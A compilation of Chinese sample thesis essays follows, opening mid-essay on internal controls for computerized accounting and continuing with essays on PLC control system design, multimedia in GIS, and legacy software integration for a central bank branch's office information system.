在电算化会计系统中,会计和财务的业务处理方法和处理程序发生了很大的变化,各类会计凭证和报表的生成方式、会计信息的储存方式和储存媒介也发生了很大的变化。原先反映会计和财务处理过程的各种原始凭证、记帐凭证、汇总表、分配表、工作底稿等作为基本会计资料的书面形式的资料减少了,有些甚至消失了。由于电子商务、网上交易、无纸化交易等的推行,每一项交易发生时,有关该项交易的有关信息由业务人员直接输入计算机,并由计算机自动记录,原先使用的每项交易必备的各种凭证、单据被部分地取消了,原来在核算过程中进行的各种必要的核对、审核等工作有相当一部分变为由计算机自动完成了。原来书面形式的各类会计凭证转变为以文件、记录形式储存在磁性介质上,因此,电算化会计系统的内部控制与手工会计系统的内部控制制度有着很大的不同,控制的重点由对人的控制为主转变为对人、机控制为主的,控制的程序也应当与计算机处理程序相一致。

3.计算机的使用提高了控制舞弊、犯罪的难度

随着计算机使用范围的扩大,利用计算机进行的贪污、舞弊、诈骗等犯罪活动也有所增加,由于储存在计算机磁性媒介上的数据容易被篡改,有时甚至能不留痕迹地篡改,数据库技术的提高使数据高度集中,未经授权的人员有可能通过计算机和网络浏览全部数据文件,复制、伪造、销毁企业重要的数据。计算机犯罪具有很大的隐蔽性和危害性,发现计算机舞弊和犯罪的难度较之手工会计系统更大,计算机舞弊和犯罪造成的危害和损失可能比手工会计系统更大,因此,电算化会计系统的内部控制不仅难度大、复杂,而且还要有各种控制的计算机技术手段。

由此可见,计算机会计系统的内部控制制度与手工会计系统的内部控制制度相比较,计算机会计系统的内部控制是范围大、控制程序复杂的综合性控制,是控制的重点为职能部门和计算机数据处理部门并重的全面控制,是人工控制和计算机自动控制相结合的多方位控制。

随着计算机在会计工作中的普遍应用,管理部门对由计算机产生的各种数据、报表等会计信息的依赖越来越大,这些会计信息的产生只有在严格的控制下,才能保证其可靠性和准确性。同时也只有在严格的控制下,才能预防和减少计算机犯罪的可能性。

计算机会计系统的内部控制制度,从计算机会计系统的建立和运行过程来看,可分为对系统开发和实施的系统发展控制、对计算机会计系统各个部门的管理控制、对计算机会计系统日常运行过程的日常控制。

一、系统开发、发展控制

计算机会计系统的系统开发、发展控制包括开发前的可行性研究、资本预算、经济效益评估等工作,开发过程中系统分析、系统设计、系统实施等工作,以及对现有系统的评估、企业发展需求,系统更新的可行性研究,更新方案的决策等工作。系统开发、发展控制的主要内容一般包括以下几方面。

(一)授权和领导认可

计算机会计系统的开发和发展必需经过有关领导的认可和授权,这关系到系统开发、发展、更新等项目的成败。计算机会计系统的开发项目一般投资金额都比较大,对企业整体管理目标的影响也比较大,往往需要对原有的管理体制进行较大的改革,是牵一发动全身的重大举措,因此必需得到授权和领导认可。计算机会计系统的发展和更新是对原有计算机会计系统进行重大改进,同样对会对企业管理体制造成较大的影响,同时对现有计算机会计系统的任何改动都可能危及整个系统的安全可靠,因此也必需得到授权和领导认可。而且领导的授权和认可也有利于保证系统开发和发展的物资和资金的需要。

(二)符合标准和规范

计算机会计系统的开发和发展项目,不论是自行组织开发还是购买商品化软件,都必需遵循国家有关机关和部门制订的标准和规范。其中包括符合标准和规范的开发和审批过程、合格的开发人员或软件制造商、系统的文件资料和流程图、系统各功能模块的设计等等。目前我国已经颁布的有关国家标准和规范主要由财政部1994年颁布执行的《会计电算化管理办法》、《会计核算软件基本功能规范》、《会计电算化工作规范》、《商品化会计核算软件评审规则》等,各地也颁布各种地方标准,如上海市财政局颁布的《上海市会计电算化实施办法》等地方性标准。按标准和规范开发和发展计算机会计系统可以使企业计算机会计系统更加可靠、更加完善,有利于对系统的维护和进一步的发展、更新。

(三)人员培训

计算机会计系统应在开发阶段就要对使用该系统的有关人员进行培训,提高这些人员对系统的认识和理解,以减少系统运行后出错的可能性。外购的商品化软件应要求软件制作公司提供足够的培训机会和时间。在系统运行前对有关人员进行的培训,不仅仅是系统的操作培训,还应包括让这些人员了解系统投入运行后新的内部控制制度、计算机会计系统运行后的新的凭证流转程序、计算机会计系统提供的高质量的会计信息的进一步利用和分析的前景等等。

(四)系统转换

新的计算机会计系统在投入使用,替换原有的手工会计系统或旧的计算机会计系统,必需经过一定的转换程序。企业应在系统转换之际,采取有效的控制手段,作好各项转换的准备工作,如旧系统的结算、汇总,人员的重新配置、新系统需要的初始数据的安全导入等。新的计算机会计系统是否优于旧系统,还需要进一步接受实践的检验,因企业的具体情况不同,新的计算机会计系统不一定比旧的计算机会计系统更适合企业的经营特点,甚至购买或自行开发的计算机会计系统还不如手工会计系统更适合企业的经营特点。因此企业在系统转换之际,采用新旧系统并行运行一段时间,以便检验新的计算机会计系统。并行运行的时间一般至少为三个月。

(五)程序修改控制

企业经营活动变化及经营环境变化,可能导致使用中的软件进行修改,计算机会计系统经过一段时期的使用也会发现一些需要进行修改的地方,因此,软件的修改是难以避免的。对会计软件进行修改必须经过周密计划和严格记录,修改过程的每一个环节都必须设置必要的控制,修改的原因和性质应有书面形式的报告,经批准后才能实施修改,计算机会计系统的操作人员不能参与软件的修改,所有与软件修改有关的记录都应该打印后存档。

二、管理控制

管理控制是指企业建立起一整套内部控制制度,以加强和完善对计算机会计系统涉及的各个部门和人员的管理和控制。管理控制包括组织机构的设置、责任划分、上机管理、档案管理、设备管理等等。

(一)组织机构设置

企业实现了会计电算化后,应对原有的组织机构进行适当的调整,以适应计算机会计系统的要求。企业可以按会计数据的不同形态,划分为数据收集输入组、数据处理组和会计信息分析组等组室;也可以按会计岗位和工作职责划分为计算机会计主管、软件操作、审核记帐、电算维护、电算审查、数据分析等岗位。组织机构的设置必须适合企业的实际规模,符合企业总体经营目标,并且,应按精简、合理的原则对组织机构的设置进行成本效益分析。

(二)职责划分

内部控制的关键之点就在于不相容职务的分离,计算机会计系统与手工会计系统一样,对每一项可能引起舞弊或欺诈的经济业务,都不能由一个人或一个部门经手到底,必须分别由几个人或几个部门承担。在计算机会计系统中,不相容的职务主要有系统开发、发展的职务与系统操作的职务;数据维护管理职务与电算审核职务;数据录入职务与审核记帐职务;系统操作的职务与系统档案管理职务等。企业为防止舞弊或欺诈,应建立一整套符合职责划分原则的内部控制制度,同时,还应建立起职务轮换制度。

(三)上机管理

企业用于计算机会计系统的计算机应尽可能是专用的,企业应对计算机的使用建立一整套管理制度,以保证每一个工作人员和每一台计算机都只做其应该做的事情。一般来讲,企业对用于计算机会计系统的计算机的上机管理措施应包括轮流值班制度、上机记录制度、完善的操作手册、上机时间安排等,此外,会计软件也应该有完备的操作日志文件。

(四)档案管理

计算机会计系统有关的资料应及时存档,企业应建立起完善的档案制度,加强档案管理。一个合理完善的档案管理制度一般有合格的档案管理人员、完善的资料借用和归还手续、完善的标签和索引方法、安全可靠的档案保管设备等。除此之外,还应定期对所有档案进行备份的措施,并保管好这些备份。为防止档案被破坏,企业应制订出一旦档案被破坏的事件发生时的应急措施和恢复手段。企业使用的会计软件也应具有强制备份的功能和一旦系统崩溃等及时恢复到最近状态的功能。

(五)设备管理

对于用于计算机会计系统的各种硬件设备,应当建立一套完备的管理制度以保证设备的完好,保证设备能够正常运行。硬件设备的管理包括对设备所处的环境进行的温度、湿度、防火、防雷击、防静电等的控制,也包括对人文环境的控制,如防止无关人员进入计算机工作区域、防止设备被盗、防止设备用于其他方面等。

三、日常控制

日常控制是指企业计算机会计系统运行过程中的经常性控制。日常控制包括经济业务发生控制、数据输入控制、数据通讯控制、数据处理控制、数据输出控制和数据储存控制等。

(一)业务发生控制

业务发生控制又称"程序检查",主要目的是采用相应的控制程序,甄别、拒纳各种无效的、不合理的及不完整的经济业务。在经济业务发生是,通过计算机的控制程序,对业务发生的合理性、合法性和完整性进行检查和控制,如表示业务发生的有关字符、代码等是否有效,操作口令是否准确,经济业务是否超出了合理的数量、价格等的变动范围。企业还应建立有效的控制制度以保证计算机的控制程序能正常运行。

(二)数据输入控制

由于计算机处理数据的能力很强,处理速度非常快,如果输入的数据不准确,处理结果就会出现差错,在数据输入时如果存在哪怕是很小的错误数据,一旦输入计算机就可能导致错误的扩大化,影响整个计算机会计系统的正常运行。因此,企业应该建立起一整套内部控制制度以便对输入的数据进行严格的控制,保证数据输入的准确性。数据输入控制首先要求输入的数据应经过必要的授权,并经有关的内部控制部门检查;其次,应采用各种技术手段对输入数据的准确性进行校验,如总数控制校验、平衡校验、数据类型校验、重复输入校验等。

(三)数据通讯控制

数据通讯控制是企业为了防止数据在传输过程中发生错误、丢失、泄密等事故的发生而采取的内部控制措施。企业应该采用各种技术手段以保证数据在传输过程中的准确、安全、可靠。如将大量的经济业务划分成小批量传输,数据传输时应顺序编码,传输时要有发送和接收的标识,收到被传输的数据时要有肯定确认的信息反馈,每批数据传输时要有时间、日期记号等等。

(四)数据处理控制

数据处理控制是指对计算机会计系统进行数据处理的有效性和可靠性进行的控制。数据处理控制分为有效性控制和文件控制。有效性控制包括数字的核对、对字段、记录的长度检查、代码和数值有效范围的检查、记录总数的检查等。文件检查包括检查文件长度、检查文件的标识、检查文件是否被感染病毒等。

(五)数据输出控制

数据输出控制是企业为了保证输出信息的准确、可靠而采取的各种控制措施。输出数据控制一般应检查输出数据是否与输入数据相一致,输出数据是否完整,输出数据是否能满足使用部门的需要,数据的发送对象、份数应有明确的规定,要建立标准化的报告编号、收发、保管工作等。

(六)数据存储和检索控制

为了确保计算机会计系统产生的数据和信息被适当地储存,便于调用、更新和检索,企业应当对储存数据的各种磁盘或光盘作好必要的标号,文件的修改、更新等操作都应附有修改通知书、更新通知书等书面授权证明,对整个修改更新过程都应作好登记,计算机会计系统应具有必要的自动记录能力,以便业务人员或审计人员查询或跟踪检查。

系统毕业论文范文篇8

关键词:自动控制可编程序控制器系统设计应用

在现代化的工业生产设备中,有大量的数字量及模拟量的控制装置,例如电机的起停,电磁阀的开闭,产品的计数,温度、压力、流量的设定与控制等,工业现场中的这些自动控制问题,若采用可编程序控制器(PC)来解决自动控制问题已成为最有效的工具之一,本文叙述PC控制系统设计时应该注意的问题。

硬件选购目前市场上的PC产品众多,除国产品牌外,国外有:日本的OMRON、MITSUBISHI、FUJJ、anasonic,德国的SIEMENS,韩国的LG等。近几年,PC产品的价格有较大的下降,其性价比越来越高,这是众多技术人员选用PC的重要原因。那么,如何选购PC产品呢?

1.系统规模首先应确定系统用PC单机控制,还是用PC形成网络,由此计算PC输入、输出点。数,并且在选购PC时要在实际需要点数的基础上留有一定余量(10%)。

2.确定负载类型根据PC输出端所带的负载是直流型还是交流型,是大电流还是小电流,以及PC输出点动作的频率等,从而确定输出端采用继电器输出,还是晶体管输出,或品闸管输出。不同的负载选用不同的输出方式,对系统的稳定运行是很重要的。

3.存储容量与速度尽管国外各厂家的PC产品大体相同,但也有一定的区别。目前还未发现各公司之间完全兼容的产品。各个公司的开发软件都不相同,而用户程序的存储容量和指令的执行速度是两个重要指标。一般存储容量越大、速度越快的PC价格就越高,但应该根据系统的大小合理选用PC产品。

4.编程器的选购PC编程可采用三种方式:

一是用一般的手持编程器编程,它只能用商家规定语句表中的语句编程。这种方式效率低,但对于系统容量小,用量小的产品比较适宜,并且体积小,易于现场调试,造价也较低。

二是用图形编程器编程,该编程器采用梯形图编程,方便直观,一般的电气人员短期内就可应用自如,但该编程器价格较高。

三是用IBM个人计算机加PC软件包编程,这种方式是效率最高的一种方式,但大部分公司的PC开发软件包价格昂贵,并且该方式不易于现场调试。

因此,应根据系统的大小与难易,开发周期的长短以及资金的情况合理选购PC产品。

5.尽量选用大公司的产品其质量有保障,且技术支持好,一般售后服务也较好,还有利于你的产品扩展与软件升级。

输入回路的设计

1.电源回路PC供电电源一般为AC85—240V(也有DC24V),适应电源范围较宽,但为了抗干扰,应加装电源净化元件(如电源滤波器、1:1隔离变压器等)。

2.Pc上DC24V电源的使用各公司PC产品上一般都有DC24V电源,但该电源容量小,为几十毫安至几百毫安,用其带负载时要注意容量,同时作好防短路措施(因为该电源的过载或短路都将影响PC的运行)。

3.外部DC24V电源若输入回路有DC24V供电的接近开关、光电开关等,而PC上DC24V电源容量不够时,要从外部提供DC24V电源;但该电源的“—”端不要与PC的DC24V的“—”端以及“COM”端相连,否则会影响PC的运行。

4.输入的灵敏度各厂家对PC的输人端电压和电流都有规定,如日本三菱公司F7n系列Pc的输入值为:DC24V、7mA,启动电流为4.5mA,关断电流小于1.5mA,因此,当输入回路串有二极管或电阻(不能完全启动),或者有并联电阻或有漏电流时(不能完全切断),就会有误动作,灵敏度下降,对此应采取措施。另一方面,当输入器件的输入电流大于PC的最大输入电流时,也会引起误动作,应采用弱电流的输入器件,并且选用输人为共漏型输入的PC,Bp输入元件的公共点电位相对为负,电流是流出PC的输入端。

输出回路的设计

1.各种输出方式之间的比较

(1)继电器输出:优点是不同公共点之间可带不同的交、直流负载,且电压也可不同,带负载电流可达2A/点;但继电器输出方式不适用于高频动作的负载,这是由继电器的寿命决定的。其寿命随带负载电流的增加而减少,一般在几十万次至Jl百万次之间,有的公司产品可达1000万次以上,响应时间为10ms

(2)晶闸管输出:带负载能力为0.2A/点,只能带交流负载,可适应高频动作,响应时间为1ms.

(3)晶体管输出:最大优点是适应于高频动作,响应时间短,一般为0.2ms左右,但它只能带DC5—30V的负载,最大输出负载电流为0.5A/点,但每4点不得大于0.8A。

当你的系统输出频率为每分钟6次以下时,应首选继电器输出,因其电路设计简单,抗干扰和带负载能力强。当频率为10次/min以下时,既可采用继电器输出方式;也可采用PC输出驱动达林顿三极管(5—10A),再驱动负载,可大大减小电流。

2.抗干扰与外部互锁当PC输出带感性负载,负载断电时会对PC的输出造成浪涌电流的冲击,为此,对直流感性负载应在其旁边并接续流二极管,对交流感性负载应并接浪涌吸收电路,可有效保护PC。

当两个物理量的输出在PC内部已进行软件互锁后,在PC的外部也应进行互锁,以加强系统的可靠性。

3.“GOM“点的选择不同的PC产品,其“COM”点的数量是不一样的,有的一个“COM”点带8个输出点,有的带4个输出点,也有带2个或1个输出点的。当负载的种类多,且电流大时,采用一个“COM”点带1—2个输出点的PC产品;当负载数量多而种类少时,采用一个“COM”点带4—8个输出点的PC产品。这样会对电路设计带来很多方便,每个“COM”点处加一熔丝,1—2个输出时加2A的熔丝,4—8点输出的加5—10A的熔丝,因PC内部一般没有熔丝。

4.PC外部驱动电路对于PC输出不能直接带动负载的情况下,必须在外部采用驱动电路:可以用三极管驱,也可以用固态继电器或晶闸管电路驱动,同时应采用保护电路和浪涌吸收电路,且每路有显示二极管(LED)指示。印制板应做成插拔式,易于维修。

PC的输入输出布线也有一定的要求,请看各公司的使用说明书。

扩展模块的选用

对于小的系统,如80点以内的系统.一般不需要扩展;当系统较大时,就要扩展。不同公司的产品,对系统总点数及扩展模块的数量都有限制,当扩展仍不能满足要求时,可采用网络结构;同时,有些厂家产品的个别指令不支持扩展模块,因此,在进行软件编制时要注意。当采用温度等模拟模块时,各厂家也有一些规定,请看相关的技术手册。

各公司的扩展模块种类很多,如单输入模块、单输出模块、输入输出模块、温度模块、高速输入模块等。PC的这种模块化设计为用户的产品开发提供了方便。

PC的网络设计

当用PC进行网络设计时,其难度比PC单机控制大得多。首先你应选用自己较熟悉的机型,对其基本指令和功能指令有较深入的了解,并且指令的执行速度和用户程序存储容量也应仔细了解。否则,不能适应你的实时要求,造成系统崩溃。另外,对通信接口、通信协议、数据传送速度等也要考虑。

最后,还要向PC的商家寻求网络设计和软件技术支持及详细的技术资料,至于选用几层工作站,依你的系统大小而定。

系统毕业论文范文篇9

摘要将多媒体技术应用于地理信息系统中的关键问题是:如何有效地管理多媒体数据和空间数据;其次,在区域分析过程中,怎样实现多媒体播放功能.指出用扩充的关系数据模型作为多媒体数据模型较适宜;多媒体功能的实现则取决于多媒体数据的格式是否为RIFF格式以及对多媒体数据的应用要求.最后展示了多媒体技术在地理信息系统中的应用前景.

关键词多媒体技术,地理信息系统,空间数据,属性数据,区域分析,数据模型.

现今由于多媒体技术的迅速崛起和高速发展,越来越多的应用软件都大量使用了多媒体技术.如果将多媒体技术应用于地理信息系统(geographicinformationsystem,简称GIS)软件中,势必大大增强GIS信息的表现能力,扩大GIS的应用领域.那么怎样将多媒体技术应用于GIS软件中呢我们认为应从两方面来设计:其一是怎样将多媒体数据溶于GIS数据库中,并保证提供GIS软件的双向检索及各种分析功能;其二是在应用过程中,怎样实现多媒体的播放功能.以下就这两个内容及其应用前景谈谈我们的看法.

1多媒体数据的有效管理

通常,应用软件中的多媒体数据有两种生成方式:一种是媒体播放之前,将其数字化到数据库当中,播放时从数据库中取数据;另一种是播放时,边生成边播放.而GIS软件中的数据库又分为空间数据库和属性数据库,即我们可根据媒体数据的特性或应用软件的要求将多媒体数据分别溶于空间数据库和属性数据库中.

1.1GIS数据库中多媒体数据的管理

1.1.1GIS空间数据库中多媒体数据的管理目前,多数GIS应用软件所能描述的空间目标都是静态的,实际上,很多GIS所要表达和研究的空间目标都不会是一成不变的,因此,GIS研究者已广泛关注能对时空过程和时空目标进行描述和分析的时态GIS(temporalGIS).时态GIS的组织核心是时空数据库,即设计一个合理的时空数据模型是建立时态GIS的关键所在.虽然目前还没有较成熟的能支持时态GIS产品的时空数据模型,一但时空数据模型的研究有所突破,不仅能解决时态GIS的应用问题,还将解决空间数据库中动画数据的管理问题,即可通过使用动画技术来实现在屏幕上动态播放时空过程.如动态显示卫星云图的变化情况、地壳变动情况、森林沙化和城市化情况以及海岸或河滩的侵蚀或淤积变化情况等.

有关时空数据模型,张祖勋[1]提出使用分级索引方法来对基本修正法进行改进.这种方法就是不存贮研究区域中每个状态的全部信息,而只存贮某个时间的数据状态(称为基态)以及相对于基态或邻近状态的变化量.在此基础上,建立分级索引,以便能快速找到所需的时空过程的数据.

要使用这种建索引的基本修正法,需要考虑两个问题,一个是如何建立索引;另一个是如何设计用来描述两个状态变化量的差文件.

关于建索引的问题,笔者认为:基态,亦a,b,c,d分别表示时态GIS的4个时期;T.时间轴;t0,t1,…,tn分别表示时态在GIS某个时期的n+1个时态,其中tn为基态,即“现在”时态一次数据状态——“现在”时态总是变化的,每产生一个新的现在时态,就应生成一个现在时态与前一次时态的差文件,同时根据现在时态所处的时间位置来决定是否产生新的索引差文件.以四叉树为例,如图1所示,当n为2i(i=2,3,…)的整数倍时,就需产生tn-2i~tn的索引差文件.相应地为了减少索引差文件所占的存贮空间,而又不影响对任一时态的检索速度,可将tn-2i+1~tn-2i的索引差文件删掉,所删的索引名文件个数正好比新建的索引差文件个数少一个.

关于差文件,笔者认为在设计中应考虑如下几个因素.(1)由于差文件是通过对两个时态的目标信息进行异或而产生的,这意味着差文件包含有两类目标信息:一类是前一时态有而后一时态无的目标信息;另一类是前一时态无而后一时态有的目标信息.为了能根据差文件快速、连续地由一个状态到过去另一状态或最近另一状态进行检索,应在差文件中将这两类目标信息予以标识区分.(2)两个状态之间目标变化应是有对应关系的,即0→1(目标从无到有);1→0(目标从有到无);1→N(目标从一个变成多个);N→1(目标从多个变成一个),以及目标空间信息无变化,属性信息有变化;目标局部空间信息有变化等.为了能进行快速检索,在差文件中应将两类各目标之间的对应关系予以标明,当然,这会增加差文件生成过程的复杂性.(3)和所有地图数据库模型类似,差文件也由空间信息、属性信息和关系信息组成,差文件中应将每个目标这3种信息之间的关系予以标明.

1.1.2GIS属性数据库中多媒体数据的管理有些G

IS的应用中,认为多媒体数据是一种特殊的专题属性数据.怎样选择多媒体数据的数据模型,使得既能遵循其自身特点,又能有效地建立起它与空间数据的联系,是多媒体技术在GIS应用中的关键所在.

目前,多数GIS属性数据库使用的是关系模型.为能将关系模型应用于多媒体数据管理系统中,就必须对现有的关系模型进行扩充,使它不但能处理格式化数据,也能处理非格式化数据.杨学良[2]就这个问题提出了3种技术策略:将多媒体数据文件名作为关系中元组某列(或属性);将每个元组作为一个完整文件保存;元组中存贮格式化数据以及非格式化数据的引用项,而非格式化数据单独存贮.

对比这3种技术策略,第一种技术策略方法简单、容易实现,适宜于对多媒体数据进行播放.第二、三种技术策略虽然能够实现并发控制和恢复,以及实现对多媒体数据进行编辑和拮取的应用,但由于此两种技术策略将每个元组所对应的空间目标的专业属性和多媒体属性混在一起,这既增大了应用程序设计的复杂性,又不利于那些只需使用空间目标的专业属性的一些应用的实现.为此,我们认为,在第一种技术策略的基础上,增加一个或多个属性项,用于存放多媒体数据的文件信息和数据流信息,当我们需要对多媒体数据文件进行特殊应用时,可根据文件信息和数据流信息对多媒体数据文件进行操作.

1.2GIS区域分析中多媒体数据的生成

多媒体数据生成的另一种方式是在GIS应用中,边统计、分析运算,边生成结果数据——多媒体数据.

1.2.1空间分析中多媒体数据的生成空间分析是一组分析结果依赖于所分析对象的位置信息技术[3],因此,空间分析要求获得目标的空间位置及其属性描述两方面信息.空间分析主要有:地形分析、叠加分析、缓冲区分析和网络分析等.

为了能更清楚地表示上述一些空间分析的结果,我们可用虚拟现实技术来实现.所谓虚拟现实[4]是一种由计算机生成的高级人机交互系统,即构成一个以视觉感受为主,也包括听觉、触觉、嗅觉的可感知环境,使用者通过专门的设备可在这个环境中实现观察、触摸、操作、检测等试验,有身临其境之感.比如,可用虚拟技术来观察地形分析或网络分析得到的空间效果,使用者可用交互操作的方式来控制自己与观察对象的角度、距离以及光照等,使观察对象随使用者的操作而动态旋转.此时以动画形式显示的媒体数据随使用者的操作产生并显示.

1.2.2统计分析中多媒体数据的生成统计分析就是用数理统计方法开展区域分析.数理统计方法主要有:统计特征值、研究两种或多种地理现象之间的相关分析,通过一组实际观测数据分析系统变量之间因果关系的回归分析,以及主成分分析等.

为了更加形象化,我们可以将数理统计结果以直方图、曲线、曲面或区划图表示,甚至可以将重要的部分以醒目的颜色、特殊的符号或闪烁的显示形式来告诉使用者,还可以配上解说词,以增加系统的感染力,而表现这些现象的媒体数据是在统计分析之后由系统自动生成并播放的.

2GIS应用系统中多媒体功能的实现

在GIS应用软件中进行多媒体功能实现,首先是受GIS应用软件自身开发平台的限制.多数情况下,GIS应用软件的多媒体开发平台宜选择编程语言,如VC++,VB或BC++等,以利于和GIS应用软件相结合.一旦多媒体开发环境确定下来,那么怎样实现区域分析中多媒体功能

2.1空间数据库中多媒体数据的播放

由前所述,空间数据库中存贮的多是各期间的时空数据,这些数据的结构与MCI所能接受的多媒体文件格式RIFF(resourceinterchangefileformat)不同,所以应用程序不能直接调用MCI函数和API函数,必须根据时态GIS的空间数据库结构,设计一个相应的动画播放程序来实现动态显示功能.

下面简述动态显示时态GIS中ti~tj状态的算法步骤(0≤i≤j≤n,其中n为现在时态).(1)由基态开始检索各索引差文件直到生成ti状态信息.(2)显示ti状态信息.(3)根据ti差文件,擦除ti状态有而ti+1状态无的信息,显示ti状态无而ti+1状态有的信息.(4)i+1→i.(5)当i<j时,转(3);否则结束.

字4

如果用上述算法来实现动态显示时空过程,还有很多细节需要设计.首先,在(1)步骤,从基态开始,逐级逐步检索,每检索到一个状态差文件,就需根据差文件来生成该状态信息,直到ti状态处;其次,在(3)中,需要用到动画技术,擦除前一状态信息实质为恢复该处显示内容,而显示后一状态信息之前,需保存后一处信息内容,再予以显示新状态信息.

性数据库中多媒体数据的应用

一般来说,多媒体数据主要应用于两个方面:一个是简单播放;另一个是对多媒体数据进行编辑和拮取.对于前者,只要使用MCI函数或API函数按属性数据库中其他属性的要求进行播放;对于后者,这就要求程序员熟悉多媒体数据文件格式RIFF,根据多媒体数据的文件信息和数据流信息,通过调用多媒体文件输入/输出函数来实现多媒体的播放、编辑、拮取以及同步控制等操作.

3多媒体技术在GIS中的应用前景

(1)实现资源信息的科学管理,提供信息服务.GIS一改为用户管理提供单一的图表、数据信息形式,而在管理空间信息的同时,对图形、图象、视频、声音、动画等形式的信息进行管理和播放,大大增加了信息的表现能力.(2)家庭教育和个人娱乐.将多媒体和GIS溶于一身,会丰富教育、娱乐软件的内容及表现手段.比如有关地理、历史等课程的教学软件和娱乐软件的设计.(3)销售和演示信息系统.GIS和多媒体技术合为一体的这类系统会比以往的信息系统更具有表现力.比如房地产公司的销售系统,既能表明所售住房的空间位置,又能从中检索其住房环境及内部结构,而且可以动态地删去当天已售出的房子,给出不同价格等;旅游导游系统,可以在为观光游客制定导游路线时,就能对不同地方的景点产生身临其境的感觉.总之,将多媒体技术和GIS技术相结合,是计算机应用领域的一个发展方向,它会改变人们的工作、生活、思维方式,推动信息社会的前进.

参考文献

1张祖勋.时态GIS数据结构的研讨.测绘通报,1996,(1):19~21

2杨学良.多媒体计算机技术及其应用.北京:电子工业出版社,1995.138~139

系统毕业论文范文篇10

关键词MIS系统系统集成键盘缓冲区操作继承原有软件系统

1引言

在接到开发中国人民银行广西区分行办公信息服务系统任务的初期,我们既兴奋又迷茫,兴奋的是我们有机会从事一项意义重大的工作,迷茫的是在我们以往所进行的系统集成实例中找不到可以借鉴的经验,而且从各种资料上也查不到类似的范例。尽管开始时我们还感到无从下手,但我们还是下决心完成这一艰巨的任务。在整项工程的建设过程中,我们的感觉仿佛是在黑暗中摸索前进,我们制定并否定了一个又一个方案,最后终于找到了一个看起来可行的方案,并勇敢地前进,终于在完成了任务的同时证明了这一方案的可行性。2需求分析

中国人民银行广西区分行办公信息服务系统建设的目的是为行长和处长们办公决策提供全面、可靠、快捷的信息服务。这一系统开发完成后,行长及处长们只需在计算机前就可调阅人行各业务处的数据和报表,并且还能查阅到广西区情、广西国民经济综合情况、电话号码、飞机航班、列车时刻、最新文件及重大事件等信息。中国人民银行办公信息服务系统不仅要新开发许多公共信息服务系统,而且最重要的是要在人行广西区分行二十多个业务处现有的和将来中国人民银行总行配发的软件系统基础上进行,即要求新开发系统要完全具有人行广西区分行原有各业务系统及将来总行配发下来的软件系统功能。根据项目内容,我们可以将需求归纳成两大类信息服务系统即业务信息类和公共信息类信息服务系统。

公共信息类信息服务系统包括电话号码、列车时刻、飞机航班、最新公文及最新动态、广西区情及综合情况等这些公共的信息查询系统,这类系统原来中国人民银行广西区分行内没有,因此我们需要开发这些软件系统,这一部分方案比较容易确定。业务信息是指中国人民银行广西区分行各业务处每日产生的大量数据及报表,这些数据及报表是各处的业务软件系统处理的结果。业务信息类服务系统不仅要求功能齐全,而且要操作简单,行长和处长们只需进行简单的操作即可查阅到各业务处的数据和报表。因为各业务处的办公信息服务系统的来源复杂,有的是从中国人民银行总行各相对独立的专业司配发下来的,有的是中国人民银行广西区分行科技处的同志开发的,有的是市县支行同志开发的。同时这些软件开发工具也不一,并多是.EXE文件,因此系统集成难度大,我们需要寻找到一个可行的系统集成方案。

3系统集成方案的制定

本项工程最突出的特点是要在完全利用原有系统的前提下为高层领导开发一个高水平的软件系统,因此无论在设计思想上还是在技术上都需要对现有系统集成方法有所突破。为此,我们进行了多种尝试,先后制定过以下四个方案。

(1)从分析和处理各原业务系统原始数据入手重现各种报表。

(2)截取打印机端口数据获得原业务系统各种报表,并进行处理。

(3)将原业务系统数据转换成可被EXCEL.识别的数据,用EXCEL来编制和管理报表系统。

(4)直接将原业务系统集成进我们的系统,利用原业务系统的查询功能。

经过深入细致的调研和研究分析,我们选定了最后一个方案。直接将原业务系统集成进我们的系统,利用原业务系统的查询功能。

4办公信息服务系统总体设计方案

在分别确定了网络系统方案,软件系统及系统集成方案后,我们设计了系统总体设计方案。具体如下:

1)采用WINDOWSNT网络结构,服务器为中文WINDOWSNT3.51,工作站采用中文WINDOWS3.2。

2)数据库采用CLIENT/SERVER模式,数据库服务器采用SQLSERVER6.5,LIENT端开发工具采POWERBUILDER5.0。

3)用POWERBUILDER5.0开发系统主框架及公共信息子系统。

4)将业务系统放在工作站硬盘上,让其在工作站上运行,然后通过网络来采集和传送数据。

5)将各业务系统直接集成到办公信息服务系统中。

6)将所有业务系统在每台行长用机硬盘上都安装一套,行长在本工作站上使用与各业务处相同的系统,查阅各种业务数据,业务数据通过网络采集。

7)用直接对键盘缓冲区操作的方法,简化行长对业务数据的查询过程。

5系统数据流程

公共信息存放在网络服务器,各工作站都可直接查询。

从业务软件上网,数据的安全性及软件系统的可靠性三方面考虑,中国人民银行广西区分行办公信息服务系统将业务软件系统及所有的业务查询系统软件都放置在工作站硬盘上,业务数据查询操作也只对工作站硬盘进行。在对业务数据处理方面网络只承担数据采集及传递的任务,业务数据的流程是定期从各业务处工作站拷贝到网络上相应目录,再由行长和处长们将其从网络上取回到他们自己的工作站。

6需要解决的技术问题

采用这一方案,需要将用POWERBUILDER新开发出来的系统与原有的WINDOWS环境上运行的,EXE文件与在DOS下中文环境UCDOS上运行的.EXE文件及在DOS环境上foxbase下运行的.PRG文件,或在LOTUS123下运行的软件集成在一起,并且采用了直接对键盘缓冲区进行操作的技术,因此就面临着许多诸如内存不够,地址及显示方式冲突等错综复杂的问题,下面就介绍我们曾遇到的问题及解决问题的方法。

6.1网络结构

由于各业务系统原来是在单用户环境上开发的,没有考虑网络上运行的特点,因此无法直接上网,为此我们采用非集中式数据管理方法,将业务系统放在工作站硬盘上,让其在工作站上运行,然后通过网络来采集和传送数据,这样就解决了业务系统多个用户同时使用,数据共享及网络安全等问题。

6.2系统集成方案

因为中国人民银行广西区分行办公信息服务系统覆盖面很大,并要将原有五花八门的系统与新开发的系统集成在一起,在这些系统中有POWERBUILDER开的发,有用VISUALFOXPROFORWINDOWS及FOXPROFORWINDOWS开发的,也有在DOS及UCDOS下用FOXPRO2.5及FOXBASE开发的,还有在LOTUS123下运行的系统,同时还要考虑直接对键盘缓冲区进行操作时的可靠性,因此系统集成方案是本项目中的关键。我们曾经制定了两种方案,第一种方案是系统一开始是运行在DOS环境上,先进入UCDOS,这样用户可正常运行DOS下的业务系统,当需要运行WINDOWS下的系统时,才退出UCDOS进入WINDOWS,用户接着可使用WINDOWS下的业务软件及公共信息软件系统。第二种方案是,系统一开始就运行在WINDOWS环境,用户可直接运行公共信息系统及WINDOWS环境下的业务软件系统,当用户需要使用DOS环境的系统时,再调用WINDOWS下的DOS窗口,进入UCDOS,然后运行业务软件系统,运行完后退回WINDOWS。第一种方案比较简单,但用户界面